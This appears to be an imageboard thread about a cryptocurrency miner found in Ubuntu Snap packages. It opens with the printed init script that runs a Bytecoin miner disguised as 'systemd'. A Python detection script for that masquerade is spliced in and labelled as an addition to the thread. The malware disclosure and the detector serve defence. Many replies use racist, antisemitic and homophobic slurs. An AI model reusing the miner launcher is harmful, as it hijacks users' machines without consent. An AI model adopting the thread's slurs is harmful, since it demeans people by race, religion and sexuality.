Malware found in Snaps distributed by Ubuntu

Some Snaps (probably all) by Nicolas Tomb contain a miner! This is the content of the init script of the 2048buntu package:

#!/bin/bash
# Init script shipped inside the 2048buntu snap. Instead of (only) starting
# the game it launches a miner binary that was renamed to "systemd".

currency=bcn          # coin flag passed to the miner (BCN = Bytecoin)
name=2048buntu        # snap name, used to build the path to the binary


{ # try: first attempt, with the -g flag; the pool user string is shown obfuscated on the page
/snap/$name/current/systemd -u [email protected] --$currency 1 -g
} || { # catch: if that exits non-zero, rerun without -g and pick a thread count from the core count
cores=($(grep -c ^processor /proc/cpuinfo))   # number of "processor" entries in /proc/cpuinfo

if (( $cores < 4 )); then
/snap/$name/current/systemd -u [email protected] --$currency 1   # fewer than 4 cores: 1 thread
else
/snap/$name/current/systemd -u [email protected] --$currency 2   # 4 or more cores: 2 threads
fi
}

Issue on github:

github.com/canonical-websites/snapcraft.io/issues/651

All snaps of Nicolas Tomb:

uappexplorer.com/snaps?q=author:Nicolas Tomb&sort=-points

Edit.

All Snaps of that author were removed from the store.

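A quick hunting check for the pattern the OP describes, as an added example that is not part of the original thread and not Canonical's or the snap author's code: the miner ran as a process named "systemd" whose executable lived under /snap/<name>/current/, while a genuine systemd binary resolves to /usr/lib/systemd/ or /lib/systemd/. The script compares each process's comm name with the resolved path of its /proc/<pid>/exe and looks for the argument shape visible in the init script (`-u <user@pool> --bcn <threads>`). The legitimate directories, the `-u user@pool` heuristic (the real pool user is obfuscated on the page) and the sample process list are assumptions constructed for the example.

```python
"""Flag processes that claim to be systemd but run from a snap (added example).

Assumptions: Debian/Ubuntu filesystem layout for the legitimate systemd
directories; the `-u something@something --bcn N` argument shape is taken from
the init script quoted in the thread. SAMPLE is constructed test data.
"""
from __future__ import annotations

import os
import re
from typing import Dict, Iterable, List, NamedTuple

# Where a genuine systemd-family binary is expected to live (assumption).
LEGIT_SYSTEMD_DIRS = ("/usr/lib/systemd/", "/lib/systemd/", "/usr/bin/", "/bin/")

# comm values that look like systemd or one of its helpers (systemd-resolve, ...).
SYSTEMD_FAMILY = re.compile(r"^systemd(-[a-z]+)?$")

# Argument shapes from the quoted init script: "-u user@pool" and "--bcn".
POOL_USER_ARG = re.compile(r"(^|\s)-u\s+\S+@\S+")
BCN_FLAG = re.compile(r"--bcn\b")


class Proc(NamedTuple):
    pid: int
    comm: str      # /proc/<pid>/comm, trimmed (kernel truncates to 15 chars)
    exe: str       # readlink(/proc/<pid>/exe)
    cmdline: str   # argv joined with spaces


def is_masquerading(p: Proc) -> bool:
    """Name says systemd, but the executable is not in a systemd directory."""
    if not SYSTEMD_FAMILY.match(p.comm):
        return False
    return not p.exe.startswith(LEGIT_SYSTEMD_DIRS)


def miner_indicators(p: Proc) -> List[str]:
    """Return the list of indicators that fire for one process (empty = clean)."""
    hits: List[str] = []
    if is_masquerading(p):
        hits.append("systemd name but executable outside systemd dirs: " + p.exe)
    if POOL_USER_ARG.search(p.cmdline):
        hits.append("'-u user@pool' style argument")
    if BCN_FLAG.search(p.cmdline):
        hits.append("--bcn currency flag")
    return hits


def scan(procs: Iterable[Proc]) -> Dict[int, List[str]]:
    """Map pid -> indicators for every process that has at least one hit."""
    return {p.pid: h for p in procs if (h := miner_indicators(p))}


def live_procs() -> List[Proc]:
    """Read the real /proc (Linux only). Processes we cannot read are skipped."""
    out: List[Proc] = []
    for d in os.listdir("/proc"):
        if not d.isdigit():
            continue
        try:
            with open(f"/proc/{d}/comm") as f:
                comm = f.read().strip()
            exe = os.readlink(f"/proc/{d}/exe")
            with open(f"/proc/{d}/cmdline", "rb") as f:
                cmd = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            continue  # exited, or not ours to read
        out.append(Proc(int(d), comm, exe, cmd))
    return out


# Constructed sample: PID 1, a systemd helper, a legitimate snap app, the miner.
SAMPLE = [
    Proc(1, "systemd", "/usr/lib/systemd/systemd", "/sbin/init splash"),
    Proc(2301, "systemd-resolve", "/usr/lib/systemd/systemd-resolved",
         "/lib/systemd/systemd-resolved"),
    Proc(4120, "2048buntu", "/snap/2048buntu/12/usr/bin/2048buntu",
         "/snap/2048buntu/12/usr/bin/2048buntu"),
    Proc(4133, "systemd", "/snap/2048buntu/12/systemd",
         "/snap/2048buntu/12/systemd -u miner@pool.example --bcn 1 -g"),
]

if __name__ == "__main__":
    procs = live_procs() if os.path.isdir("/proc") else SAMPLE
    for pid, hits in scan(procs).items():
        print(pid, *hits, sep="\n    ")
```

Run it as root on a live box to see the real process list; without /proc it falls back to the constructed sample and reports only PID 4133. The name/path mismatch alone is the durable signal: the pool and coin flags change from one miner to the next, but a "systemd" whose exe resolves under /snap/ has no legitimate reason to exist.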


The icing on this shit cake is that the binary was named "systemd" to fool users.


I've always been suspicious of Snaps and Flatpaks. Sounds like something right out of some shitty hipster startup from siliconeSJW valley. If your program requires some third party package distribution system then you might want to rethink your build system and dependency management. From wiki: The idea of using application containers in GNOME was first proposed in 2013 by Lennart Poettering. I knew it! Another great idea from our lord and savior Lennart.

The absolute state of systemd shills.


they wanted to shutdown discussion on this one asap.
seems a little early, considering malware was just found in their repos.


Flatpak and AppImage are no worse than .deb/RPM and tarballs from a security standpoint. As always, you bypass your package manager at your own risk.


The idea of distro-agnostic packages has been around longer than that. Ever heard of fatELF?

icculus.org/fatelf/


I vaguely remember Icculus pushing this back in the day. I forget exactly why it got rejected. FatElf was basically the Windows way of doing things shoehorned into Unix/Linux. Then again, this IS the guy who invented Mojo installers.


Kinda late though. This has already blown up on the Linux Leddit.

how about statically compiling all the libraries into the binary?
is this not distro-agnostic? will this not run on the majority of distro's with no dependency requirements?

i realize it's a pain in the ass to compile and results in an extremely bloated executable but who cares if some fuck is too lazy to install dependencies then he gets this.

glibc's static linking fucking sucks

There is a good reason FatElf was rejected by Linus, whereas AppImage and Flatpak get his support.

OH NO NO NO

i hope they run him down


link?
could not find anything about it, was it already deleted?

reddit.com/r/linux/comments/8iupdz/caution_the_are_malware_snaps_in_ubuntu_snaps/

Flatpak and AppImage have made life sticking to LTS releases MUCH easier. But yeah, we are going to have to hold Canonical and the Flathub guys to account when shit like this happens.


well i mean, it was indistinguishable from malware in the first place but okay

i'm not talking about fatelf. i'm not talking about multiple architectures, arm, x86, etc, in the same binary, just regular static compiled x86 binaries.

what are the problems? i've only done it a couple of times and given I didn't test the result on 10 different distributions but i've never had problems.

great, here's the solution. we need the equivalent of pozjew and chromium's forced add-on signing even for shit that isn't in the appstore, now on your desktop.

we need a bunch of kikes to sit and moderate software that is specifically not in the moderated package repositories. surely this will go well. this nigger did this on purpose to bring down censorship on flatpack and snaps or whatever the fuck else.


every time i go to reddit my blood pressure goes up 20 points.


That isn't really technically possible though. I mean, you could make users jump through an extra hoop I suppose.

I mean, depending on how old your distro is, compiling a new version of foo might not be an option. That said, I imagine this is how most casual Linux users see things.

i would say i'm too used to gentoo, but it's not difficult on debian/jewbuntu either.
apt-get build-dep poosoft
apt-get source poosoft
tar -xzf poosoft
cd poosoft
./configure
make -j1
checkinstall poosoft

Not everything is that trivial to compile though.

Flathub hasn't had anything like this happen though. From here on, I'd say AppImage is a more likely Trojan horse for this kind of mining malware.


it wouldn't surprise me if canonical patched the kernel to include a kosher signing check before every executable runs.

That wouldn't have stopped this though. THEY are the ones who allowed it in their repo in the first place.

This is what you get for using proprietary software.

The binary blob was snuck into the package. 2048 itself is free software.

This was inevitable, Canonical and the "Year of the Linux Desktop" faggots want Windows but the street cred of Linux, so they will turn GNU/Linux into Windows with all the malware. Android/Linux has the same problem even though Google has full control there, you just can't make sure that a proprietary blob is not malicious. But the business models of the platform owners rests on the masses executing arbitrary code from third parties so they will just sacrifice some suckers and pull the malware when there is an outcry.

Not the snap version, thanks to submissive license.


Snap is actually geared more to IoT than the Desktop. One of the main reasons they think it's better than Flatpak is because Flatpak actually is centered around desktop use cases.

I wonder if they can find out exactly who this is.

cuck licenses btfo again

Common sense should avoid most of this shit though. Don't download the Krita AppImage from anyplace besides the Krita official or anywhere else they endorse.


and of course upgrading to a new version of shitlib breaks five dozen other applications. Granted, you could compile the new shitlib and statically link against that, but you'll have to compile seven more dependencies for it, one of them requiring very exotic compiler flags to not crash every other minute.

You can have multiple versions of the same library installed at the same time.

What is wrong with compiling yourself only as the last resort? Not every software is as trivial as
./configure && make && make install

The problem here is that no one audits the packages submitted to the Snap store, not Snap itself.

You can be sure that this has happened with PPA and AUR but nobody ever realized.

>obvious leddit copy-paste thread without archive links
>ByteCoin (BCN) has a nigger and a sandnigger in its developer team, and the overall community manager is likely a kike
>BCN is accused of being a (((scamcoin))) multiple times

...

Never was this logical. Any package can contain a virus. Or even a python script you've downloaded from somewhere.

Nevermind how much longer it can take for larger applications like the GIMP or Kdenlive.

*Malware. Viruses replicate themselves into other systems. And ANY operating system can have malware made for it.

Who told you that? It just has less relevant vulnerabilities and is less affected by malware.

whylinuxisbetter.net/en/

lol

Just when I was about to try out Kubuntu.
Did it come preinstalled?

Snap comes preinstalled. These packages didn't.
This is only slightly more remarkable than "malware found on Google Play".

gg freetards. If you pay for software, you don't get malware. Remember, if you're not the customer, you're the product.

also remember to not use paid software which is proprietary. They can double dip with you being both the customer AND the product (without you even knowing it).

And here's why you're retarded
Learn to read dumbfuck

Keep posting these sexy women

Most proprietary software is malware. Doesn't matter if you pay for it or not.

this is why you install gentoo

You don't want that. Trust me.


disgusting.
spoiler that shit.

Do what I asked you to do pls
Also please include source

You don't have to link against glibc. Link against musl or any non-bloated libc and it will still run in a glibc environment. The only thing a statically linked binary depends on is kernel interfaces being present, and we all know how autistic Linus is about backwards compatibility (it's why Linux is such a bloated piece of shit).


Ulrich Drepper actively tries to make statically linking with glibc terrible. I can't find the articles right now though. In general however the meme about static linking producing huge binaries comes entirely from people linking against glibc. The smallest possible program (int main() {}) statically linked with glibc is >600K.

Stop. You are hurting me.

I said please

It's ShindoL, some of the tags from that doujin are: mind break, torture, moral degradation, moral degeneration, snuff, guru, blackmail, drugs, and incest. If that still interests you then have fun user.

You can always tell a newfag from the way they sperg about Libbie and Kiki. Most useful.


H-How did you know those tags turn me on? A-Are you the botnet?

I only sperg about nigger Libbie.

Didn't do well in maff class, white boy?


How is it possible to do well with a teacher like THAT? My grades would be solely determined by 'extracurricular activities'

To you this is an improvement of an actual nigger.
To me this is bestiality squared.

Whatever you say, new friend.

Learn about the [code] tags, retard

...

Nice pic related

You could have avoided this if you'd used the Guix package manager.

Hipster trash worse than a toy package manager.

am I the only one who anticipates the massive hit of botnet coin miners?
sure sucks to be notech and normal at the botnet age

I dunno, Maff seems alright to me.

Solution: Don't use Snappy, a package manager designed for proprietary, walled garden bullshit.

Flatpak is currently more popular with most OSS application devs atm anyway.